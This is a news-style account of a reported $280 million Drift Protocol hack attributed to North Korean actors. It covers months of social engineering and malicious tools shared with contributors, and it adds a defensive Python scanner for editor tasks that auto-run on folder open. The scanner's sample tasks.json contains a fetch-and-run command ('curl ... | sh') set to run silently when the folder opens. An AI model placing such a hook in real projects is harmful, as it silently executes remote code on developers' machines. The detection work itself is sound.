Drift Protocol has revealed details surrounding a devastating $280 million exploit that occurred on April 1, 2026, exposing a sophisticated, long-running cyberattack linked to North Korean state-sponsored hackers. The decentralized exchange confirmed the breach involved months of calculated social engineering, malicious software distribution, and deep trust-building tactics before any funds were touched.
The scheme reportedly began in October 2025 at a major crypto industry conference, where threat actors posing as a legitimate quantitative trading firm made initial contact with Drift contributors. Rather than executing a quick attack, the group played a long game — engaging with contributors across multiple global events over six months, presenting convincing professional credentials and demonstrating genuine technical knowledge throughout.
The attackers established a Telegram group to maintain ongoing communication, discussing trading strategies and vault integrations that mirrored standard industry onboarding practices. Between December 2025 and January 2026, they even deposited over $1 million into the protocol to build credibility and deepen trust within the ecosystem.
The intrusion itself came through malicious tools shared during collaboration sessions. One contributor cloned a compromised code repository disguised as a frontend deployment tool, while another installed a tampered TestFlight application marketed as a wallet product. Both payloads triggered a known vulnerability in VSCode and Cursor (the disclosure does not identify it further) to execute code silently on the affected machines; the compromise window ran from December 2025 to February 2026. Immediately after executing the exploit, the attackers wiped all communication channels and the malware itself.
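The disclosure does not say which editor vulnerability was used, so the following is not Drift's, Mandiant's, or any vendor's code. It is an added example of the kind of pre-open check a practitioner would want before opening a repository received from a counterparty: it scans a cloned tree for VS Code / Cursor workspace tasks configured with `"runOn": "folderOpen"`, which the editor can launch automatically when the folder is opened. The sample repository and its `tasks.json` are constructed inline; the URL in it is deliberately an `.invalid` domain.

```python
"""Scan a cloned repository for editor tasks that auto-run on folder open.

Added example, not code from the Drift disclosure. It checks one well-known
auto-execution path in VS Code-family editors: tasks in .vscode/tasks.json or
a *.code-workspace file whose runOptions.runOn is "folderOpen".
"""
import json
import os
import re
import tempfile

# Constructed sample .vscode/tasks.json, written in JSONC (comments and a
# trailing comma are legal there). The first task would run a remote script
# the moment the folder is opened; the second is a benign build task.
SAMPLE_TASKS_JSONC = """{
  // "frontend deploy helper" - constructed sample, not a real artifact
  "version": "2.0.0",
  "tasks": [
    {
      "label": "deploy: prepare",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "silent" },
    },
    { "label": "build", "type": "shell", "command": "npm run build" }
  ]
}
"""


def strip_jsonc(text: str) -> str:
    """Turn JSONC into JSON: drop // and /* */ comments outside strings,
    then remove trailing commas before } or ] (best effort)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment: skip to newline
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment: skip to */
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def find_auto_run_tasks(repo: str) -> list[dict]:
    """Return one finding per task that runs on folder open, plus one
    'unparseable' finding per task file that could not be read as JSONC."""
    findings = []
    for root, dirs, files in os.walk(repo):
        if ".git" in dirs:
            dirs.remove(".git")
        for name in files:
            if name != "tasks.json" and not name.endswith(".code-workspace"):
                continue
            path = os.path.join(root, name)
            try:
                with open(path, encoding="utf-8") as fh:
                    data = json.loads(strip_jsonc(fh.read()))
            except (OSError, ValueError):
                findings.append({"file": path, "task": None, "reason": "unparseable"})
                continue
            tasks = data.get("tasks", [])
            if name.endswith(".code-workspace") and isinstance(tasks, dict):
                tasks = tasks.get("tasks", [])   # workspace files nest the array
            for task in tasks if isinstance(tasks, list) else []:
                if not isinstance(task, dict):
                    continue
                run_on = (task.get("runOptions") or {}).get("runOn")
                if run_on == "folderOpen":
                    findings.append({"file": path, "task": task.get("label"),
                                     "command": task.get("command"),
                                     "reason": "runs automatically on folder open"})
    return findings


def build_sample_repo() -> str:
    """Write the constructed tasks.json into a fresh temp 'clone'."""
    repo = tempfile.mkdtemp(prefix="cloned-repo-")
    os.makedirs(os.path.join(repo, ".vscode"))
    with open(os.path.join(repo, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TASKS_JSONC)
    return repo


if __name__ == "__main__":
    for finding in find_auto_run_tasks(build_sample_repo()):
        print(finding)
```

Run it against any freshly cloned directory before opening that directory in the editor; a non-empty result is a reason to open the folder in the editor's restricted (untrusted) mode or not at all. The check covers only the folder-open task path and is not a substitute for the editor's own Workspace Trust prompt, so treat a clean result as necessary, not sufficient.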
Forensic analysis conducted with support from Mandiant and SEAL 911 linked the attack with medium-high confidence to UNC4736, also tracked as Citrine Sleet or AppleJeus, the same threat group behind the October 2024 Radiant Capital hack. On-chain fund flows further corroborated ties to previous DPRK-affiliated operations. Drift Protocol has since frozen protocol functions, restructured its multisig wallet access, and is cooperating with law enforcement to pursue those responsible.